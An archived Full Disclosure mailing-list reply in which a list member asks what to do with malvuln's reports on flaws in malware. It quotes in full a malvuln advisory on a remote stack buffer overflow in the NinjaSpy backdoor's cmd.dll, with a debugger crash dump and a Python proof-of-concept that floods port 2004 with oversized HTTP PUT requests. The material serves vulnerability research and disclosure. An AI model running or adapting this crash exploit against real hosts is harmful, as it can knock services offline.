[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-Id: <79AE58BB-2C89-499A-B60F-731B7076C827@gmail.com>
Date: Fri, 8 Jan 2021 07:53:44 -0800
From: Matthew Fernandez <matthew.fernandez@...il.com>
To: malvuln <malvuln13@...il.com>
Cc: fulldisclosure@...lists.org
Subject: Re: [FD] Backdoor.Win32.NinjaSpy.c / Remote Stack Buffer Overflow
How should we be treating the stream of malware vulnerabilities you’ve reported recently? If something is malware, surely I want to remove it from my machine anyway? I’m all for full disclosure, but I’m just trying to understand if there’s anything actionable list members could do with this information. Thank you for your work on this, which is quite interesting to follow by the way.
> On Jan 7, 2021, at 20:41, malvuln <malvuln13@...il.com> wrote:
>
> Discovery / credits: malvuln - Malvuln.com (c) 2021
> Original source:
> https://malvuln.com/advisory/6eece319bc108576bd1f4a8364616264.txt
> Contact: malvuln13@...il.com
> Media: twitter.com/malvuln
>
> Threat: Backdoor.Win32.NinjaSpy.c
> Vulnerability: Remote Stack Buffer Overflow
> Description: The specimen drops a DLL named "cmd.dll" under C:\WINDOWS\
> which listens on both TCP ports 2003 and 2004. By sending consecutive HTTP
> PUT requests with large payload of characters we can cause buffer overflow.
>
> Type: PE32
> MD5: 6eece319bc108576bd1f4a8364616264
> Vuln ID: MVID-2021-0018
> Dropped files: cmd.dll
> ASLR: False
> DEP: False
> Safe SEH: True
> Disclosure: 01/08/2021
>
> Memory Dump:
> 0:000> .ecxr
> eax=41414141 ebx=41414141 ecx=03fe0ea2 edx=0019eb08 esi=0420986c
> edi=03fe0e9d
> eip=00440f57 esp=0019eae0 ebp=0019eb18 iopl=0 nv up ei pl nz na po
> nc
> cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b
> efl=00210202
> cmd+0x40f57:
> 00440f57 83bb8001000000 cmp dword ptr [ebx+180h],0
> ds:002b:414142c1=????????
>
> FAULTING_IP:
> cmd+40f57
> 00440f57 83bb8001000000 cmp dword ptr [ebx+180h],0
>
> EXCEPTION_RECORD: ffffffff -- (.exr 0xffffffffffffffff)
> ExceptionAddress: 00440f57 (cmd+0x00040f57)
> ExceptionCode: c0000005 (Access violation)
> ExceptionFlags: 00000000
> NumberParameters: 2
> Parameter[0]: 00000000
> Parameter[1]: 414142c1
> Attempt to read from address 414142c1
>
> PROCESS_NAME: cmd.dll
>
> OVERLAPPED_MODULE: Address regions for 'jscript9' and
> 'resourcepolicyclient.dll' overlap
>
> ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced
> memory at 0x%p. The memory could not be %s.
>
> EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced
> memory at 0x%p. The memory could not be %s.
>
> EXCEPTION_PARAMETER1: 00000000
>
> EXCEPTION_PARAMETER2: 414142c1
>
> READ_ADDRESS: 414142c1
>
> FOLLOWUP_IP:
> cmd+40f57
> 00440f57 83bb8001000000 cmp dword ptr [ebx+180h],0
>
> MOD_LIST: <ANALYSIS/>
>
> NTGLOBALFLAG: 0
>
> APPLICATION_VERIFIER_FLAGS: 0
>
> FAULTING_THREAD: 000014f4
>
> BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141
>
> PRIMARY_PROBLEM_CLASS: INVALID_POINTER_READ_FILL_PATTERN_41414141
>
> DEFAULT_BUCKET_ID: INVALID_POINTER_READ_FILL_PATTERN_41414141
>
> LAST_CONTROL_TRANSFER: from 764ee0bb to 00440f57
>
> STACK_TEXT:
> WARNING: Stack unwind information not available. Following frames may be
> wrong.
> 0019eb18 764ee0bb 00920602 00000046 00000000 cmd+0x40f57
> 0019eb44 764f8849 03fe0e9d 00920602 00000046
> user32!_InternalCallWinProc+0x2b
> 0019eb68 764fb145 00000046 00000000 0019ed14 user32!InternalCallWinProc+0x20
> 0019ec38 764e8503 03fe0e9d 00000000 00000046
> user32!UserCallWinProcCheckWow+0x1be
> 0019eca0 764dfbfa 02c1f600 00000000 00000046
> user32!DispatchClientMessage+0x1b3
> 0019ece8 773d0bcd 0019ed04 00000038 0019ee20
> user32!__fnINOUTLPWINDOWPOS+0x4a
> 0019ed38 76832eec 76521878 000f0a14 76521760
> ntdll!KiUserCallbackDispatcher+0x4d
> 0019ed3c 76521878 000f0a14 76521760 0055060a win32u!NtUserSetFocus+0xc
> 0019ed5c 764ee0bb 0055060a 00000110 000f0a14 user32!MB_DlgProc+0x118
> 0019ed88 764f8849 76521760 0055060a 00000110
> user32!_InternalCallWinProc+0x2b
> 0019edac 764fac8c 00000110 000f0a14 0019f3e8 user32!InternalCallWinProc+0x20
> 0019ee30 764dbf65 0055060a 00000110 000f0a14
> user32!UserCallDlgProcCheckWow+0x10f
> 0019ee8c 764dbe45 02c49f90 00000000 00000110 user32!DefDlgProcWorker+0x115
> 0019eeac 764ee0bb 0055060a 00000110 000f0a14 user32!DefDlgProcW+0x25
> 0019eed8 764f8849 764dbe20 0055060a 00000110
> user32!_InternalCallWinProc+0x2b
> 0019eefc 764fb145 00000110 000f0a14 0019f3e8 user32!InternalCallWinProc+0x20
> 0019efcc 764fa89c 7a4afc30 00007ffe 00000110
> user32!UserCallWinProcCheckWow+0x1be
> 0019f038 76505b67 02c49f90 00000000 0019f3e8 user32!SendMessageWorker+0x6ff
> 0019f154 76506533 764d0000 0267a708 00000000
> user32!InternalCreateDialog+0x1137
> 0019f198 7654043b 00e80416 76521760 0019f3e8 user32!InternalDialogBox+0xc8
> 0019f264 768339ec 0019f3d0 76522093 0019f3e8
> user32!SoftModalMessageBox+0x72b
> 0019f26c 76522093 0019f3e8 07c43d40 00000000
> win32u!NtUserModifyUserStartupInfoFlags+0xc
> 0019f4ac 0045a743 00e80416 04229764 041f562c user32!MessageBoxWorker+0x29a
> 0019f530 0045a85a 00000010 0019fd34 0045a87b cmd+0x5a743
> 0019f658 0045a63f 00000000 004aa4e0 0045e01d cmd+0x5a85a
> 0019fd50 00420446 00000401 0000036c 00000008 cmd+0x5a63f
> 0019fd68 764ee0bb 005b0464 00000401 0000036c cmd+0x20446
> 0019fd94 764f8849 03fe0f05 005b0464 00000401
> user32!_InternalCallWinProc+0x2b
> 0019fdb8 764fb145 00000401 0000036c 00000008 user32!InternalCallWinProc+0x20
> 0019fe88 764e90dc 03fe0f05 00000000 00000401
> user32!UserCallWinProcCheckWow+0x1be
> 0019fef4 764e38c0 0019ff68 0045a30c 0019ff1c
> user32!DispatchMessageWorker+0x4ac
> 0019fefc 0045a30c 0019ff1c 0019ff00 004ce046 user32!DispatchMessageA+0x10
> 0019ff68 004a992c e046004c 0019ffcc 00404498 cmd+0x5a30c
> 0019ff80 76e38654 002d2000 76e38630 6a961c86 cmd+0xa992c
> 0019ff94 773c4a77 002d2000 8aaf072f 00000000
> kernel32!BaseThreadInitThunk+0x24
> 0019ffdc 773c4a47 ffffffff 773e9eda 00000000 ntdll!__RtlUserThreadStart+0x2f
> 0019ffec 00000000 004ce046 002d2000 00000000 ntdll!_RtlUserThreadStart+0x1b
>
>
> STACK_COMMAND: ~0s; .ecxr ; kb
>
> SYMBOL_STACK_INDEX: 0
>
> SYMBOL_NAME: cmd+40f57
>
> FOLLOWUP_NAME: MachineOwner
>
> MODULE_NAME: cmd
>
> IMAGE_NAME: cmd.dll
>
> DEBUG_FLR_IMAGE_TIMESTAMP: 2a425e19
>
> FAILURE_BUCKET_ID:
> INVALID_POINTER_READ_FILL_PATTERN_41414141_c0000005_cmd.dll!Unknown
>
> BUCKET_ID:
> APPLICATION_FAULT_INVALID_POINTER_READ_FILL_PATTERN_41414141_cmd+40f57
>
>
> Exploit/PoC:
> from socket import *
>
> MALWARE_HOST="x.x.x.x"
> PORT=2004
> c=1
> JUNK="A"*8601
> AMT=10
> PAYLOAD = "PUT /"+JUNK+" HTTP/1.0 Content-Type:
> application/x-www-form-urlencoded Content-Length: dkKoybHost: 35409\r\n"+
> "Accept-Charset: "+JUNK
>
> def doit():
> global c, JUNK, PAYLOAD, AMT
> while True:
> s=socket(AF_INET, SOCK_STREAM)
> s.connect((MALWARE_HOST, PORT))
> s.send(PAYLOAD)
> s.close()
> c+=1
> if c==AMT:
> print("Backdoor.Win32.NinjaSpy.c / Remote Stack Buffer
> Overflow")
> print("MD5: 6eece319bc108576bd1f4a8364616264")
> print("By Malvuln")
> exit()
>
> if __name__=="__main__":
> doit()
>
>
>
> Disclaimer: The information contained within this advisory is supplied
> "as-is" with no warranties or guarantees of fitness of use or otherwise.
> Permission is hereby granted for the redistribution of this advisory,
> provided that it is not altered except by reformatting it, and that due
> credit is given. Permission is explicitly given for insertion in
> vulnerability databases and similar, provided that due credit is given to
> the author. The author is not responsible for any misuse of the information
> contained herein and accepts no responsibility for any damage caused by the
> use or misuse of this information. The author prohibits any malicious use
> of security related information or exploits by the author or elsewhere. Do
> not attempt to download Malware samples. The author of this website takes
> no responsibility for any kind of damages occurring from improper Malware
> handling or the downloading of ANY Malware mentioned on this website or
> elsewhere. All content Copyright (c) Malvuln.com (TM).
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists